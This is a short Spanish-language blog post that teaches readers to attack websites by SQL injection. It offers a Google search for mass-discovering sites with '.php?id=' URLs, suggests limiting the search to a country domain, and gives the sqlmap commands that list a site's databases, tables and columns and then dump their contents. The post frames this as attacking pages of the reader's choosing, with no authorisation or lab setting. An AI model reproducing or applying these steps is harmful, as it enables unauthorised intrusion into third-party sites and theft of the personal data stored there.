las paginas que quieres atacar tendrían una terminación parecida a esta .php?id=435
y si no quieres un blanco en especifico solo pon esto en google y te dará todas las paginas con .php?id=
inurl:".php?id=" site:.mx
donde dice site puedes quitarlo ya que da las paginas de México y si te encuentras en otro país solo pon la terminación correspondiente
inurl:".php?id="
si no sabes como hacer esto y te preguntas como se hace bájate back Track ya que es un sistema de auditorias(nueva versión Back Track 5r3)
1 cd /pentest/database/sqlmap
2 python sqlmap.py -u http://pagina web --dbs (es para sacar base de datos)
3 después de que tengas la base de datos seria python sqlmap.py -u http://pagina web -D base de datos --tables (para sacar informacion de la base)
4 después python sqlmap.py -u http://pagina web -D base de datos -T ejemplo --columns
5 después de que tengas las columnas sigue python sqlmap.py -u http://pagina web -D base de datos -T ejemplo -C ejemplo --dump
No hay comentarios:
Publicar un comentario